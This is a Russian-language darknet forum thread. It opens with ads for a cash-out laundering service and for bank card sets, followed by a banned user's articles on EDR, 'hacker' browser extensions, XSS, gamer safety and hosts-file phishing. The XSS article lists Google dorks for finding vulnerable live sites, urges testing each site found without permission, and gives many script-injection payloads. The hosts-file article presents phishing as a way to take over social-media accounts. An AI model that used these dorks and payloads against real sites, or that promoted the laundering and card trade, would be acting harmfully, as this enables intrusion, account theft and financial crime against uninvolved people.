TARANTINO OBNAL SERVICE №1 на рынке теневых услуг.
Депозит 1 млн.


✔️ Профессиональное сопровождение любых финансовых операций.

✔️ Россия, страны СНГ и Европы:

  • ➢ ФИЗ / ЮР лица
  • ➢ Мерчанты
  • ➢ ЭПС
  • ➢ Sim-карты
  • ➢ Работа с криптой по всему миру
  • ➢ Денежные переводы
ПЕРЕЙТИ К ТЕМЕ

ДЕБЕТОВЫЕ КАРТЫ СБЕРМАРКЕТ
  • ⭐️ Пожизненная гарантия от краж.
  • ⭐️ Все в наличии. Экспресс-доставка. Лучшие цены.
  • ⭐️ Ветка 2021 года. Сотни отзывов.
  • ⭐️ Статус Ветеран на ДаркМани.
  • ⭐️ Депозит миллион ₽.
КАРТЫ РФ 🇷🇺
КАРТЫ ГРУЗИИ 🇬🇪
ЛК КАЗАХСТАНА 🇰🇿


БОЛЕЕ 1000 КОМПЛЕКТОВ ДРУГИХ ТОПОВЫХ БАНКОВ ВСЕГДА В НАЛИЧИИ

>>> ПЕРЕЙТИ К ТЕМЕ <<<
Telegram: https://t.me/SberMarketTG

У форума есть зеркало в Тор http://darkmonn6oy55o7kgmwr4jny2gi2zj6hyalzcjgl444dvpalannl5jid.onion
Официальный канал Darkmoney в Телеграм https://t.me/+k1c69d6xQsswYzU0
NEW! 🔥 Чат Darkmoney в Телеграм https://t.me/+q40pcoHjSRVmNTE0

Blackmast_education

Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
EDR — обнаружение и реагирование на угрозы конечных точек

EDR — обнаружение и реагирование на угрозы конечных точек

827c5f585bdc249ac297453aa5a08d4e.jpg



Вступить в наш чат
Каждый день пользователи сталкиваются с различными киберугрозами, поскольку злоумышленники находят новые способы атак. Это требует надежных мер безопасности, и одним из главных решений является обнаружение и реагирование на угрозы конечных точек (EDR). EDR служит важнейшим щитом против угроз, отслеживая и быстро реагируя на потенциальные опасности, скрывающиеся в конечных точках.


a84e58177dbe7ca194797766d22d0aac.jpg



Что такое конечные точки
Конечные точки — это физическое оборудование, которое подключается к сетевой системе. Это могут быть мобильные устройства, настольные компьютеры, виртуальные машины, встроенная аппаратура или серверы. Средства обеспечения безопасности конечных точек помогают защитить их от злоумышленников и уязвимостей.

Киберпреступники выбирают конечные точки для атак, поскольку они позволяют получить доступ к личным данным. Они находятся за пределами сетевого периметра безопасности, и за их защиту отвечают пользователи, которые часто допускают ошибки. Защита конечных точек от атак имеет первостепенное значение, и за нее отвечает EDR.

Что такое EDR
EDR или Endpoint Detection and Response (в переводе с англ. обнаружение и реагирование на угрозы конечных точек) — важнейшее решение в области кибербезопасности, предлагает непрерывный мониторинг и защиту от различных угроз, нацеленных на конечные точки. Эти угрозы охватывают широкий спектр: от вредоносного программного обеспечения и программ-вымогателей до фишинга и сложных эксплойтов нулевого дня.

EDR анализирует данные, собранные с различных устройств, таких как компьютеры, ноутбуки, серверы и мобильные устройства, быстро выявляя любые подозрительные действия и реагируя на них.

Основные функции EDR
По своей сути EDR выполняет три важные функции:

Сбор данных: EDR постоянно собирает данные с конечных точек, анализируя информацию об активности файлов, сетевых подключениях и т.д.. Эти данные составляют основу возможностей EDR по обнаружению и реагированию.
Обнаружение угроз: EDR использует передовые методы, включая машинное обучение, поведенческий анализ и анализ угроз для выявления закономерностей, указывающих на потенциальные угрозы. Сюда входит обнаружение известных вредоносных программ, программ-вымогателей, фишинга и эксплойтов нулевого дня.
Автоматизированный ответ: при обнаружении угрозы EDR может предпринять автоматические действия для устранения угрозы. Эти действия могут включать изоляцию зараженной конечной точки, помещение вредоносных файлов в карантин или даже полное удаление угрозы.
Механизмы обнаружения EDR
EDR использует различные механизмы для выявления и классификации потенциальных угроз:

Обнаружение на основе подписей. Этот традиционный метод сравнивает подписи файлов с базой данных известных вредоносных программ. Если файл соответствует известной подписи, он помечается как вредоносный.
Эвристический анализ. Этот метод проверяет поведение и характеристики файла для выявления подозрительных закономерностей, которые могут указывать на вредоносное ПО, даже если сам файл неизвестен.
Поведенческий анализ. Благодаря поведенческому анализу EDR активно отслеживает запущенные процессы и приложения, быстро обнаруживая аномалии, которые могут сигнализировать о вредоносных действиях. Этот метод способствует превентивному выявлению потенциальных угроз.
Машинное обучение. Используя алгоритмы машинного обучения, EDR эффективно анализирует обширные наборы данных, быстро выявляя сложные закономерности, указывающие на потенциальные угрозы. Такой подход значительно расширяет возможности обнаружения угроз.
Анализ угроз. Благодаря интеграции с потоками данных об угрозах EDR всегда находится в курсе новейших ландшафтов угроз, уязвимостей и развивающихся методов атак. Эта интеграция позволяет системе активно предвидеть и противодействовать возникающим угрозам.
Лучшие инструменты EDR
Вот некоторые из передовых инструментов EDR на рынке:

Palo Alto Networks Cortex XDR
Palo Alto Networks Cortex XDR предлагает комплексное решение EDR, обеспечивающее не только видимость конечных точек, но и надежное обнаружение угроз и возможности быстрого реагирования на атаки. Cortex XDR, известный своими расширенными функциями машинного обучения, легко интегрируется с различными устройствами, повышая их общую безопасность.

SentinelOne Singularity
Singularity — это облачное решение EDR, известное своей простотой использования и способностью масштабироваться до крупных предприятий. Он предлагает множество функций, включая обнаружение конечных точек, поиск угроз и автоматическое ликвидирование.

CrowdStrike Falcon Insight XDR
Falcon Insight XDR — еще одно облачное решение EDR, известное своими мощными возможностями обнаружения и использованием машинного обучения для выявления угроз. Falcon XDR решает самые серьезные проблемы обнаружения и реагирования на инциденты, обеспечивая: видимость, поиск и реагирование с неслыханной скоростью и масштабом.

Cynet 360 AutoXDR
Cynet 360 AutoXDR - это усовершенствованная платформа для обнаружения и реагирования на угрозы, которая точно обнаруживает сложные кибератаки, такие как Advanced Persistent Threats (APT), продвинутые вредоносные программы, трояны, вымогатели и атаки "нулевого дня".

Trend Micro XDR
XDR — это облачное решение EDR, которое собирает и коррелирует данные, охватывая несколько уровней безопасности — электронную почту, конечные устройства, серверы, сети и облачные нагрузки. Такой анализ данных позволяет быстрее обнаруживать угрозы и сокращать время расследования и реагирования.

Выбор лучшего инструмента для вас будет зависеть от ваших конкретных потребностей и требований.

Заключение
Перед лицом быстро меняющихся угроз EDR выступает в качестве важного инструмента для пользователей и организаций, стремящихся защитить свои данные и системы. Использование EDR имеет решающее преимущество в борьбе с киберугрозами.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Топ 7 хакерских расширений для вашего браузера

Топ 7 хакерских расширений для вашего браузера

8100cb69d9504c37be15c1efe872dd96.jpg



Вступить в наш чат
В интернете, где на каждом шагу скрываются угрозы, важно уметь защищать свое личное киберпространство. Расширения браузера предлагают уникальный уровень защиты как для хакеров, так и для обычных пользователей, которые беспокоятся о безопасности своих данных. Эти расширения имеют множество функций: от выявления уязвимостей до защиты паролей. И сегодня мы поделимся с вами 7 лучшими расширениями браузера, о которых должен знать каждый.


ea3d5cb1993e7102cf0081b52a665ce8.jpg



1. Foxyproxy Standard


dbacdd1357e336196eb6fb9a64598fe3.png



Представьте себе сёрфинг в Интернете без ограничений, легкий обход геоблокировок и доступ к контенту со всего мира. С Foxyproxy Standard это становится реальностью. Расширение позволяет легко переключать IP-адреса, а обширная сеть прокси-серверов гарантирует, что у вас всегда будет надежное соединение под рукой с повышенной безопасностью во время просмотра.

2. Multi-Account Containers

2abc489ec37b9b036b929df23cc7ada3.jpg



Multi-Account Containers - это расширение, разрабатанное Mozilla и позволяющее разделить просмотр между различными помеченными цветом вкладками для защиты вашей конфиденциальности. Используя эти контейнеры, вы можете категоризировать просмотр на основе целей и создавать вкладки для Работы, Банкинга, Покупок и Личного. Контейнер с несколькими учетными записями выступает в роли вашего личного органайзера, изолируя каждую учетную запись в отдельные категории, чтобы файлы cookie и учетные данные для входа не мешали друг другу. Это расширение не только упрощает управление учетной записью, но и защищает вашу конфиденциальность, предотвращая межсайтовое отслеживание и несанкционированный доступ.

3. Pwnfox

a9556025725e568c8bf1f0cb4b867b09.jpg



Для тех, кто хочет попробовать себя в роли хакера или эксперта по безопасности, выявляя уязвимости, Pwnfox станет бесценным помощником. Это расширение легко интегрируется с веб-браузерами, сканируя сайты на наличие пробелов в безопасности, а затем предоставляет подробную инструкцию о том, как их можно использовать.

4. HackBar V2 (Firefox) and HackBar (Chrome)

bbc2ed88b4f80f463f9c0ac24c5df9ed.jpg



Представьте себе, что у вас под рукой есть набор команд, инструментов и фрагментов кода, готовых упростить ваши задачи по взлому. С HackBar это становится возможным. Он автоматизирует повторяющиеся задачи, упрощает сложные операции и повышает общую производительность.

5. Hack-Tools

dfd4c2d551b129602afb8de81c8b7e7d.jpg



Hack-Tools — это сокровищница для хакеров и специалистов по кибербезопасности, предлагающая полный набор инструментов, адаптированных к различным аспектам хакинга. От полезных нагрузок XSS до инструментов кодирования данных и генератора хэшей. Hack-Tools имеет универсальный магазин для широкого спектра потребностей в области кибербезопасности, который станет незаменимым помощником в вашем наборе инструментов.

6. Shodan

e7da2cf151c5ebbab91350cf568b5486.jpg



Раскрыть тайный мир интернет устройств теперь стало возможным благодаря Shodan, известной поисковой системе, специально разработанной для этой цели. Это расширение легко интегрирует возможности Shodan в ваш веб-браузер, позволяя вам искать и анализировать устройства на основе их IР адресов, портов и другой соответствующей информации. Shodan — бесценный инструмент для исследователей безопасности и хакеров.

7. uBlock Origin

f76a1e7ad3146de0bd8f057744d9bf0e.jpg



В интернете на сегодняшний день навязчивая реклама, всплывающие окна и вредоносные скрипты стали нежелательной нормой. Они тормозят вашу работу и ставят под угрозу вашу конфиденциальность. uBlock Origin поможет вам в этом деле, заблокируя все возможные помехи на ваших веб-страницах благодаря обширным фильтрам и настройкам.

Заключение
Сфера кибербезопасности постоянно развивается, поэтому необходимо вооружиться надежными инструментами, чтобы противостоять угрозам и защищать свои данные. Сегодня мы рассказали вам о 7 расширениях браузера, тщательно отобрав самые лучшие с учетом их функциональности и значимости. Но на этом наша подборка не заканчивается, в следующей части мы поговорим о других расширениях для улучшения ваших навыков, оптимизации рабочего процесса и повышения общей эффективности в цифровом мире. Надеемся, эти расширения помогут вам в работе, защитив ваше цифровое пространство.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Хакерские расширения, которые прокачают твой браузер

Хакерские расширения, которые прокачают твой браузер


78778e42e895b60cb1c0c57dc9706c23.jpg


Вступить в наш чат​
Знали ли вы, что выполнять аудит, взлом и другие задачи можно просто из браузера, если его подготовить должным образом? Дело в том, что браузеры - это уже не просто средства просмотра веб-страниц, а универсальные платформы для взаимодействия с любыми удаленными сервисами. Они могут заменить собой целый набор утилит, совершенно не требуя взаимодействия с Kali Linux. В этой статье мы рассмотрим хакерские расширения, которые прокачают ваш браузер.
7d12c2e40ef656ec217617e29b729c37.jpg

Ранее мы уже начали освещать данную тему и поделились с вами подборкой лучших расширений для браузера. Нажмите сюда, чтобы прочитать статью. Однако, это были далеко не все утилиты, и сегодня мы продолжаем делиться другими расширениями для улучшения вашего браузера и оптимизации рабочего процесса.

Wappalyzer:
c09afcabc9a1037145b1140726973153.jpg

Вы когда-нибудь задумывались о технологиях, которые обеспечивают работу сайтов, которые вы посещаете? Wappalyzer — это расширение браузера, которое раскрывает технологии, используемые на веб-сайтах. Оно определяет системы управления контентом, платформы eCommerce, веб-серверы, фреймворки JavaScript инструменты аналитики и многое другое. Одним щелчком мыши Wappalyzer показывает изнанку работы этих сайтов, предлагая ценную информацию специалистам по кибербезопасности и всем, кому интересно узнать о механизмах, лежащих в основе сайтов. Полученная информация поможет в поиске уязвимостей веб-приложения.

Cookie Editor
a6dea05c8cba70016a350e71175737f0.jpg

Ваша конфиденциальность в Интернете имеет первостепенное значение, и файлы cookie, хранящиеся на веб-сайтах, могут сыграть злую шутку с вашей безопасностью. Но существует «Cookie Editor» или в переводе с английского «Редактор Куки», который дает вам возможность редактировать и удалять файлы cookie по своему усмотрению. С помощью этого расширения вы можете выборочно отключать файлы cookie, чтобы защитить свою конфиденциальность и предотвратить нежелательное отслеживание вашей активности.

DotGit

DotGit — расширение для проверки наличия на сайте папок git/.svn/.hg. Тулза поможет найти незащищенные файлы .env, security.txt и многое другое. Просмотр .git / config одним кликом мышки. DotGit упрощает этот процесс, обеспечивая плавную интеграцию функций Git в ваш веб-браузер. DotGit устраняет необходимость переключения между приложениями и оптимизирует рабочий процесс.

Note Anywhere
c1d87f74bbc6a7747a05896301173f1f.jpg

Ведение журналов и записей при проведении OSINT разведок крайне необходимо, поэтому представляем вам «Note Anywhere» или «Заметки где угодно». Это расширение превращает ваш браузер в универсальный инструмент для создания заметок, позволяя записывать важную информацию сию же минуту, при проведении разведок. Note Anywhere оптимизирует работу, гарантируя что ваши мысли и идеи всегда будут зафиксированы «на бумаге».

Hunter – расширение для поиска электронной почты
d673942e70527c7cd632cbba50f361bf.jpg

Hunter - еще одно расширение в помощь OSINT разведчикам. Это расширение автоматически выполняет поиск электронной почты на сайтах, связанных с доменом, который вы сейчас посещаете. Благодаря своей обширной базе данных и мощным возможностям поиска, Hunter экономит ваше время и усилия при проведении OSINT.

Retire.js:
818c47fec5800c19cea3bb218401803a.jpg

JavaScript, вездесущий язык, на котором работает бесчисленное количество веб-сайтов, также может создавать уязвимости безопасности, если его не реализовать должным образом. Retire.js решает эту проблему, выявляя и отключая устаревшие и потенциально небезопасные библиотеки JavaScript на посещаемых вами веб-сайтах. Это расширение существенно повышает безопасность вашего просмотра веб-страниц.

Blackbox

Извлечение определенных фрагментов текста с веб-сайтов для дальнейшего анализа или исследования — обычная задача хакеров и специалистов по кибербезопасности. «Blackbox» или «Черный ящик» упрощает этот процесс, позволяя выбирать и копировать текст прямо с веб-страниц, независимо от их форматирования или ограничений.

OWASP Pen Testing Kit
fc07ac2af3178fecf9c59d085a2f5cbc.jpg

Расширение браузера Pen Testing Kit упрощает задачи по обеспечению безопасности приложений, предлагая встроенные в браузер сканер DAST и SCA для обнаружения ряда уязвимостей, таких как SQL-инъекции, XSS и других угроз. Благодаря прокси-серверу для анализа трафика он обеспечивает безопасность, выявляя риски на ранней стадии посредством интеграции Selenium.

Заключение
Сфера кибербезопасности постоянно развивается, поэтому необходимо вооружиться надежными инструментами, чтобы противостоять угрозам и защищать свои данные. Надеемся, эти расширения помогут вам в работе, защитив ваше цифровое пространство, а также оптимизируют процесс хакинга и повысят общую эффективность в цифровом мире. На этом все. Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
XSS атакует! Как найти XSS-уязвимости на сайте

XSS атакует! Как найти XSS-уязвимости на сайте

b560b6d039a8a14dd5d893f79e5fbd08.jpg



Вступить в наш чат​
XSS (Cross Site Scripting, межсайтовый скриптинг) – один из видов уязвимостей компьютерной системы, с помощью которой вредоносные скрипты внедряются в контент веб-сайта. Специфика хакерских атак, с использованием XSS, заключается в том, что вместо атаки, нацеленной на сервер, мошенники используют сервер в качестве средства атаки на клиента. Это позволяет хакеру использовать доверенный для пользователя сайт в своих целях, от кражи данных до показа рекламы. Но как на самом деле обнаружить XXS-уязвимости и защититься от них, мы сегодня и расскажем.

45f7143cffb2308c3dbf2df283e680cb.jpg


Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Что такое XSS-уязвимости
XXS-уязвимость — это не просто сбой в коде; это открытое приглашение для хакеров, брешь в онлайн-безопасности. Эта уязвимость позволяет злоумышленникам внедрять сценарии в веб-страницы, просматриваемые другими пользователями, открывая путь для широкого спектра кибератак — от кражи конфиденциальной информации до перехвата пользовательских сеансов.

Атаки с использованием межсайтового скриптинга (XSS) — это способ атаки, при котором вредоносные сценарии внедряются на безопасные и надежные веб-сайты. XSS-атаки происходят, когда злоумышленник использует веб-приложение для отправки вредоносного кода пользователю, обычно в виде сценария на стороне браузера. В то время, как браузер пользователя не имеет возможности узнать, что скрипту нельзя доверять, выполняет его. После этого хакер может получить доступ к любым файлам cookie или другой конфиденциальной информации, хранящейся в браузере и используемой на этом сайте. Эти сценарии могут даже перезаписать содержимое HTML-страницы.

Типы XSS
Можно выделить два основных вида скриптинга:

1) Постоянный или хранимый XSS. С одной стороны, этот вид скриптинга встречается реже, поскольку требует от взломщика бОльшего количества навыков. С другой стороны – он гораздо опаснее, поскольку злоумышленник получает возможность внедрить вредоносный код на сервер сайта, и скрипт будет активироваться при каждом запросе к странице.

2) Непостоянный или отраженный XSS. Он встречается гораздо чаще и менее «требователен» к навыкам атакующего. Однако, для реализации этого вида скриптинга пользователь должен посетить специально сформированную ссылку, которую злоумышленнику нужно распространить.

Также, ряд специалистов выделяет в отдельную группу XSS-инъекции в DOM-модели, поскольку они не отражаются в HTML и детектировать их сложнее, но реализуется эта уязвимость на стороне клиента, следовательно – практически неприменима для массового распространения.

Как найти XSS на сайте
Но как обнаружить эту микроскопическую щель в цифровой броне? Это похоже на поиск иголки в стоге сена, но при наличии правильных инструментов и знаний это вполне осуществимо. Чтобы найти XSS на действующем веб-сайте, прежде всего, нам нужно найти веб-сайт, на котором присутствуют XSS-уязвимости. Для этого существует несколько инструментов тестирования безопасности веб-приложений, таких как OWASP ZAP, Burp Suite, Acunetix, XSStrike, BeEF и другие.

Но в этой статье мы будем искать их вручную с помощью нескольких интересных Google Dorks, которые помогут нам найти уязвимые параметры на действующих веб-сайтах:

inurl:index.php?id=
inurl:product.php?id=
inurl:category.php?id=
inurl:article.php?id=
inurl:gallery.php?id=
inurl:page.php?id=
inurl:show.php?id=
inurl:detail.php?id=
inurl:view.php?id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:topic.php?ID=
inurl:forum.php?topic=
inurl:viewforum.php?id=
inurl:profile.php?id=
inurl:showthread.php?t=
inurl:member.php?action=profile&id=
inurl:productlist.php?id=
inurl:shop_category.php?id=
inurl:catalog.php?cat=
Для начала мы выберем поиск XSS

inurl:index.php?id=

25a119198546469a4c9fc08cac414167.jpg



«Что теперь?», спросите вы. Советуем просто тестировать каждый сайт, так вы можете обнаружить нечто, действительно, стоящее.

Мы так и сделали. Действовав вслепую, мы нашли несколько сайтов, уязвимых для XSS.

4c1bf3e9e346b027f107324c24736bca.jpg



Какой скрипт мы использовали?
<script>alert(123);</script>

<ScRipT>alert("XSS");</ScRipT>

<script>alert(123)</script>

<script>alert("hellox worldss");</script>

<script>alert('XSS')</script>

<script>alert('XSS');</script>

<script>alert('XSS')</script>

'><script>alert('XSS')</script>

<script>alert(/XSS/)</script>

<script>alert(/XSS/)</script>

</script><script>alert(1)</script>

'; alert(1);

')alert(1);//

<ScRiPt>alert(1)</sCriPt>

<IMG SRC=jAVasCrIPt:alert('XSS')>

<IMG SRC='javascript:alert('XSS');'>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=javascript:alert('XSS')>

<img src=xss onerror=alert(1)>


Есть более сложные, например:

<svg/onload=alert(/XSS/)>

<div data-content="<svg/onload=alert('XSS')">Hover over me</div>

<input type="text" value="<script>alert('XSS')</script>">

<svg/onload=alert('XSS')>

<a href="javascript:alert('XSS')">Click Me</a>

<style>.xss{background-image:url("javascript:alert('XSS')");}</style><div class="xss"></div>

<div id="test" onmouseover="alert('XSS')"></div>

<script>document.getElementById('test').setAttribute('onmouseover', 'alert(\'XSS\')')</script>

<script>

var name = "<img src=x onerror=alert('XSS')>";

document.write("Hello, " + name);

</script>

<img src="javascript:alert('XSS')">

<button onclick="alert('XSS')">Click Me</button>

Есть еще несколько, которые вы можете найти здесь.

Как защититься от XSS-атак
Атаки с использованием межсайтового скриптинга (XSS) внедряют вредоносный код на сайты и перехватывают пользовательские сеансы, похищая данные или распространяя вредоносное ПО. Но вы можете усилить свою защиту следующим образом:

Проверка ввода. Прежде чем обрабатывать любые данные, полученные от пользователей (формы, URL-адреса, файлы cookie), тщательно проверьте их на соответствие ожидаемым форматам и длинам. Очистите входные данные, удалив специальные символы и закодировав потенциально опасные.
Используйте белый список. Вместо внесения в черный список нежелательных символов, используйте белый список допустимых символов. Это более строгий подход, но он снижает риск пропуска вредоносных шаблонов.
Кодировка вывода. Кодируйте весь вывод: при создании HTML, JavaScript или другого кода, который будет отображаться пользователям, убедитесь, что он правильно закодирован, чтобы предотвратить интерпретацию вредоносных сценариев. Используйте библиотеки или встроенные функции для безопасного кодирования.
Используйте политику безопасности контента (CSP). CSP определяет ресурсы (скрипты, стили), которые веб-сайт может загружать. Он ограничивает несанкционированное выполнение сценариев и может предотвратить XSS-атаки, даже если другие средства защиты не сработали.
Профилактика. Регулярно обновляйте ПО, веб-приложения, платформы и библиотеки для устранения уязвимостей, используемых злоумышленниками.
Используйте методы безопасного кодирования. Разработчики должны быть обучены методам безопасного кодирования, чтобы избежать распространенных уязвимостей, которые могут привести к XSS-атакам.
Ограничьте права пользователя. Предоставьте пользователям минимальный уровень доступа, необходимый для их задач. Это снижает потенциальное воздействие в случае успеха XSS-атаки.
Внедрите заголовки безопасности HTTP. Используйте заголовки безопасности, такие как X-XSS-Protection и X-Content-Type-Options, для настройки поведения браузера и предотвращения атак XSS.
Дополнительные меры безопасности
Сканирование уязвимостей. Регулярно сканируйте свой сайт и веб-приложения на наличие уязвимостей, которыми могут привести к XSS-атакам.
Брандмауэры веб-приложений (WAF). Рассмотрите возможность внедрения WAF для фильтрации и блокировки вредоносного трафика до того, как он достигнет вашего веб-приложения.
Совершенствуйте свои знания в области кибербезопастности. Узнавайте больше о XSS и других атаках вместе с нашими статьями. Будьте осторожны при нажатии на подозрительные ссылки или вводе конфиденциальной информации на сайтах.
Заключение
Помните, защита от XSS — это непрерывный процесс, а не единоразовое исправление проблемы. Приняв все меры безопасности, описанные выше, и сохраняя бдительность,
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
10 правил безопасности для геймеров: как защититься от взлома

10 правил безопасности для геймеров: как защититься от взлома

10352ce000069ee8f3b62987f0fd684a.jpg



Вступить в наш чат​
В захватывающем мире онлайн-игр, где каждый клик — это шаг к победе, а каждая секунда имеет значение, вы сражаетесь не просто с виртуальными противниками, вы боретесь с реальными угрозами, которые могут подорвать вашу конфиденциальность. Во время всей игры вы можете встретить неожиданных противников от коварных хакеров до хитрых фишинговых мошенников. Но не стоит беспокоиться, ведь сегодня мы расскажем, как бороться с 10 главными угрозами, преследующими игровую вселенную. Итак, хватайте свое игровое снаряжение, прокачивайте свои навыки кибербезопасности и давайте отправимся в приключение!


773c0fdee395f295526e47e488d68efb.jpg


10 угроз для геймеров
Фишинг
Фишинговые атаки являются самой распространенной угрозой в игровом сообществе. Киберпреступники создают поддельные страницы входа или рассылают электронные письма, чтобы обманом заставить игроков раскрыть свои учетные данные. Чтобы не стать жертвой фишинга, всегда дважды проверяйте URL-адрес и адрес отправителя электронной почты. Используйте браузер со встроенной защитой от фишинга.

Слабые пароли
Использовать слабые пароли — это все равно, что оставить входную дверь настежь открытой. Создавайте надежные и уникальные пароли для своих игровых учетных записей и регулярно меняйте их. А для дополнительного уровня безопасности включите двухфакторную аутентификацию (2FA).

Взлом аккаунта
Взлом аккаунта может привести к разрушительной потере внутриигровых предметов и прогресса. Чтобы этого не произошло, никогда не делитесь своими данными для входа, даже с друзьями. Будьте осторожны с подозрительными попытками входа в систему и сообщайте о любых необычных действиях в службу поддержки игры.

Доксинг
Доксинг предполагает раскрытие личной информации игрока без его согласия, такой как его настоящее имя, адрес или номер телефона. Защитите свою личность, используя никнейм, и никогда не делитесь личной информацией в чатах или на форумах. Будьте осторожны при общении с незнакомцами.

Внутриигровое мошенничество
В сообществах онлайн-игр часто есть игроки, которые стремятся использовать других ради личной выгоды. Остерегайтесь внутриигрового мошенничества, например, такого как раздача поддельных предметов. Занимайтесь сделками только в рамках игры, а не за ее пределами на других площадках.

Вредоносное ПО и вирусы
Геймеры, скачивающие читы или хаки для игр, могут подвергнуть свой компьютер воздействию вредоносных программ и вирусов. Поэтому постоянно обновляйте антивирус и избегайте загрузки файлов с ненадежных сайтов.

Распределенные атаки типа «отказ в обслуживании» (DDoS)
DDoS-атаки нацелены на игровые серверы, что приводит к задержкам и отключению игроков. Используйте виртуальную частную сеть (VPN), чтобы скрыть свой IP-адрес и защититься от DDoS-атак. Кроме того, сообщайте администраторам игры о любых предполагаемых DDoS-инцидентах.

Социальная инженерия
Социальная инженерия предполагает манипулирование игроками с целью разглашения конфиденциальной информации. Будьте осторожны, принимая запросы на добавление в друзья от незнакомцев, и не делитесь личными данными или финансовой информацией с кем-либо в игре.

Сторонние торговые площадки
Покупка внутриигровых предметов или учетных записей на сторонних торговых площадках может привести к мошенничеству и бану учетной записи. Для покупок придерживайтесь официальной торговой площадки игры, всегда читайте отзывы пользователей и изучайте репутацию продавца.

Уязвимости голосового чата
Голосовой чат может иметь уязвимости, которыми могут воспользоваться злоумышленники. Регулярно обновляйте ПО голосового чата и используйте проверенные приложения с надежными мерами безопасности. Геймеры будьте осторожны, делясь конфиденциальной информацией во время разговоров.

Как оставаться в безопасности в онлайн-играх
Соблюдение мер безопасности во время игры крайне необходимо для защиты вашей личной информации и игровых учетных записей. Вот несколько важных советов, которые помогут геймерам оставаться в безопасности:

Используйте надежные и уникальные пароли. Создавайте сложные пароли для своих игровых учетных записей, состоящие из прописных и строчных букв, цифр и символов. Избегайте использования в паролях легко угадываемой информации, такой как ваше имя или дата рождения. Рассмотрите возможность использования надежного менеджера паролей для безопасного создания и хранения ваших паролей.
Включите двухфакторную аутентификацию (2FA). По возможности включите 2FA в своих игровых аккаунтах. Это добавляет дополнительный уровень безопасности, требуя второго этапа проверки, обычно через смс или приложение для аутентификации.
Будьте осторожны с фишингом. Будьте осторожны с электронными письмами, сообщениями или ссылками, которые запрашивают ваши учетные данные для входа. Подтвердите личность отправителя и проверьте URL-адреса на наличие ошибо. Никогда не переходите по подозрительным ссылкам, особенно в сообщениях чата от неизвестных игроков.
Защитите свои персональные данные. Не делитесь личной информацией с другими игроками. При создании используйте псевдоним вместо настоящего имени.
Постоянно обновляйте свое программное обеспечение. Регулярно обновляйте антивирус и следите за обновлениями игры, чтобы устранить потенциальные уязвимости безопасности. Включите автоматические обновления, чтобы всегда использовать новейшие и наиболее безопасные версии ПО.
Используйте надежные приложения голосового чата. Если вы используете голосовой чат во время игры, скачайте надежные и безопасные приложения. При этом, никогда не делитесь конфиденциальной информацией во время разговоров.
Остерегайтесь внутриигрового мошенничества. Будьте осторожны с внутриигровым мошенничеством, таким как раздача поддельных предметов. Занимайтесь транзакциями только внутри официальных систем игры.
Выбирайте проверенные игровые площадки. Если вы покупаете/продаете внутриигровые предметы или учетные записи, совершайте сделки в официальном игровом магазине или на сайтах с надежной репутацией. Также прочитайте отзывы пользователей и изучите рейтинг продавца.
Сообщайте о подозрительной активности. Если вы столкнулись с каким-либо подозрительным поведением, попытками взлома или с мошенничеством в игре, незамедлительно сообщите об этом в службу поддержки игры.
Установите настройки конфиденциальности. Настройте параметры конфиденциальности в игре, чтобы ограничить объем личной информации, которую видят другие пользователи.
Заключение
Во время игр ваша безопасность и конфиденциальность должны быть для вас главным приоритетом. Оставаясь в курсе различных существующих угроз и принимая превентивные меры для своей защиты, вы можете наслаждаться игрой, не беспокоясь о том, что станете жертвой мошенничества или других вредоносных действий. Не забывайте использовать надежные пароли, включать 2FA и быть осторожными при взаимодействии с другими игроками в сети. Приняв все вышеуказанные меры защиты,
 
Последнее редактирование:
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Фишинг с помощью файлов hosts

Фишинг с помощью файлов hosts

4beaa83c9b95f47cd6d54a0940033002.jpg


Многие хакеры прибегают к сложным инструментам, когда дело доходит до взлома. Однако, существуют и очень легкие способы хакинга. Знаете ли вы, какой самый простой способ взломать аккаунты в социальных сетях? Ответ — фишинг с использованием файла hosts, также известный как взлом файла hosts. Итак, сегодня мы продемонстрируем вам, как злоумышленники взламывают социальные сети с помощью этого способа.

86062d0b67e1b4db10ad0e687a43ab72.jpg


Что такое файл hosts
Файл hosts – это документ, который присутствует на каждом ПК и содержит сведения о домене и IP-адресе, относящимся к нему. Основными задачами этого файла являются: назначение локального доменного имени, перенаправление веб-сайта на другой домен, блокировка веб-сайта, создание ярлыков веб-сайта и т. д. Другими словами, файл hosts это своего рода «мини-DNS-сервер». Когда пользователь вводит URL в адресной строке браузера, тот проверяет наличие указанного имени домена в файле hosts, прежде чем начнет искать DNS-сервер во «внешней» сети, что позволяет существенно сэкономить время.

Как устроен взлом с помощью файла hosts
Злоумышленники могут воспользоваться этим способом для перенаправления пользователя на нужные им ресурсы. Например, мошенник может перенаправлять все поисковые запросы через Google на нужный ему сайт просто путем редактирования файла hosts: сопоставив URL поисковых систем с IP-адресом собственного сайта. Таким же образом вредоносное ПО может предотвратить обновление программы, обеспечивающей безопасность, путем сопоставления соответствующих доменных имен в файле hosts с IP-адресом компьютера жертвы.

Прежде чем мы покажем на практике, как все происходит небольшой дисклеймер.

Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Как взломать социальные сети с помощью файла hosts
Взлом социальных сетей с помощью файла hosts состоит из 3-х этапов. Основной принцип заключается в том, что вы редактируете локальный файл хоста, чтобы он указывал на фишинговый веб-сайт. Сначала осуществляется доступ к локальному хосту, а затем к глобальному DNS. Изменив локальный хост, вы можете незаметно взломать любую учетную запись в интернете, если, конечно, будете знать, как это сделать правильно.

Первый этап — создание фишинговой страницы.

1640239c79cc03396772e71c7b2633f6.jpg


Мы уже ни раз писали руководства по созданию фишинговых страниц. Вы можете найти их ниже:

Топ-10 фишинговых инструментов всех времен
Фишинг с Lockphish
Как создать фишинговую страницу для взлома Facebook
Фишинговая ссылка: как её проверить и создать
Создаем фишинговые URL-адреса как профи
